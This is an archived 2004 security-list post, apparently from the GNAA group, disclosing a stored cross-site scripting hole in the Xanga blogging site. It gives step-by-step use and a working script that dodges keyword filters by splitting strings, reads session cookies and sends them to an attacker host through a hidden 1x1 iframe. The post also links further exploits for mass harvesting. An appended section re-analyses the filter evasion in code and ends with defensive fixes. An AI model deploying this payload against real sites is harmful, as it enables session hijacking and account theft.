lists.openwall.net | Open Source and information security mailing list archives
Message-ID: <affebc6f05010111405ff5108d@mail.gmail.com>
From: gerryniger at gmail.com (gnaa/rkz)
Subject: Xanga Login Cookie Stealing Vulnerability - GNAA Security Center

Vendor: Xanga
URL: http://www.xanga.com/
Versions: Current
Remote: Yes
Vendor notified: 06 Oct 2004 at 14:08
Vendor response: NONE

Summary:
~~~~~~~~
Xanga is a fully featured blogging system; it provides great control over the look & feel of a user's blog by allowing HTML with only basic checks. Xanga has well over 100,000 users and millions of page views every hour. A security vulnerability in the current system allows malicious users to steal session cookies.

===================================
Example Code:
~~~~~~~~~~~~~
Pre-reqs:
* Create an account; this does not require a valid email.

1. Click Look & Feel on the lefthand navigation bar.
2. In the "Insert your own HTML" box enter the following code.

~~~~~~~~~~~~CUT AFTER HERE~~~~~~~~~~~~~~~~~
<script>
// Assemble the tag names from fragments so Xanga's "basic checks" on the
// submitted HTML never see "<iframe" or "cookie" as a single string.
var gt = "<";
var lt = ">";
var if1 = "ifr";
var if2 = "ame";
var quot = '"';

// Read the cookie jar without the literal text "cookie" in the source.
// (The original post emitted a second <script> block via document.write()
// to do this; a written script block only runs after the current one has
// finished, so the variable was referenced before it existed.)
var cookies = document["coo" + "kie"].split(';');

// WRITE COOKIE TO TOP OF SCREEN.
document.write(cookies);

// Return the value of the cookie called `name`, or undefined if absent.
// Replaces the three copy-pasted loops of the original post.
function getCookie(name) {
    for (var i = 0; i < cookies.length; i++) {
        var c = cookies[i];
        while (c.charAt(0) == ' ') c = c.substring(1, c.length);
        if (c.indexOf(name + "=") == 0) return c.substring(name.length + 1, c.length);
    }
}

// THE FOLLOWING CODE DEMONSTRATES HOW TO STEAL THE COOKIE.
// "SOMEWEBSITE" SHOULD BE A SITE WHERE YOU CAN TAIL THE LOGS
// OR MAYBE WRITE A SPECIFIC SCRIPT TO CAPTURE THE ARGUMENTS PROVIDED.
var url = "http://SOMEWEBSITE/";

// Emit a 1x1 iframe whose URL carries the guid, username and session id.
document.write(gt + if1 + if2);
document.write(" src=" + quot + url + "?guid=" + getCookie("GUID"));
document.write("&u=" + getCookie("u"));
document.write("&x=" + getCookie("x"));
document.write(quot + " WIDTH=1 HEIGHT=1" + lt);
document.write(gt + "/" + if1 + if2 + lt);
</script>
~~~~~~~~~~~~END CUT HERE~~~~~~~~~~~~~~~~~
=========================================
Impact:
~~~~~~~
This code just shows how to steal session cookies; it would seem that getting hits to a malicious user's blog could be quite hard. This is not the case. When combined with existing Xanga exploits:

1. http://homepage.ntlworld.com/allencastro/autoreg.gnaa
2. http://homepage.ntlworld.com/allencastro/xanga.gnaa

it could potentially generate thousands of hits and even become featured on Xanga's front page (due to the popularity of the page), meaning the attacker could get thousands of logins in a few hours.

Vendor:
~~~~~~~
Vendor was informed months ago but we have received no reply.

Credits:
~~~~~~~~
K5 Article on Xanga: http://www.kuro5hin.org/story/2004/12/28/161214/43
The GNAA Security Team: http://www.gnaa.us/
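Added example, not code from the GNAA post or from Xanga: it shows why the "basic checks" on user HTML described in the advisory cannot stop this class of payload, and what the payload assembles once it runs. The three source snippets, the assumed substring filter, and the sample cookie jar (GUID, u, x) are all constructed here to mirror the post's technique; nothing is known about what Xanga's filter actually tested.

```javascript
// Added example (not part of the GNAA post): keyword blacklists versus
// the string-splitting trick the post uses, plus the exfil URL it builds.
// All inputs below are constructed for the demo.

// 1. Plain access, which any substring filter catches.
const PLAIN = 'var c = document.cookie.split(";");';
// 2. String concatenation, the post's gt + e1 + e2 + lt style.
const SPLIT_CONCAT = 'var c = eval("documen" + "t.cook" + "ie").split(";");';
// 3. Fragments emitted by separate document.write() calls, as the post does.
const SPLIT_WRITE = 'document.write("var c = documen"); ' +
  'document.write("t.cook"); document.write("ie.split(\';\');");';

// Naive blacklist: reject anything containing document.cookie.
// Assumed to resemble Xanga's "basic checks"; the advisory does not say.
function blacklistBlocks(src) {
  return /document\s*\.\s*cookie/i.test(src);
}

// Slightly smarter: fold "a" + "b" into "ab" before checking.
// Escapes inside literals are not handled; enough for the demo.
function foldConcatenations(src) {
  const re = /(["'])((?:(?!\1).)*)\1\s*\+\s*(["'])((?:(?!\3).)*)\3/;
  let prev;
  do {
    prev = src;
    src = src.replace(re, (m, q1, a, q2, b) => q1 + a + b + q1);
  } while (src !== prev);
  return src;
}

function blacklistBlocksFolded(src) {
  return blacklistBlocks(foldConcatenations(src));
}

// What the payload does once it runs: parse document.cookie into a map.
// Generalises the post's three copy-pasted loops to any cookie name.
function parseCookies(cookieString) {
  const out = {};
  for (const part of cookieString.split(';')) {
    const c = part.trim();
    const eq = c.indexOf('=');
    if (eq > 0) out[c.slice(0, eq)] = c.slice(eq + 1);
  }
  return out;
}

// Build the URL the post's 1x1 iframe requests. Values are URL-encoded
// here, which the post did not bother with.
function buildExfilUrl(base, cookieString) {
  const c = parseCookies(cookieString);
  const pick = (name) => encodeURIComponent(c[name] || '');
  return base + '?guid=' + pick('GUID') + '&u=' + pick('u') + '&x=' + pick('x');
}

// Constructed cookie jar in the shape the post expects.
const SAMPLE_COOKIES = 'GUID=abc123; u=alice; x=deadbeef';

for (const [label, src] of [['plain', PLAIN], ['concat', SPLIT_CONCAT], ['write', SPLIT_WRITE]]) {
  console.log(label, 'naive blocks:', blacklistBlocks(src), 'folded blocks:', blacklistBlocksFolded(src));
}
console.log(buildExfilUrl('http://SOMEWEBSITE/', SAMPLE_COOKIES));
```

The folding filter catches the `+` form but not the `document.write()` form, because the pieces never sit next to each other in the submitted source; every further heuristic invites another encoding. The actual fix is not to let user-supplied HTML carry script at all (parse it and keep only an allowlist of elements and attributes) and to mark session cookies HttpOnly so they never appear in `document.cookie` in the first place.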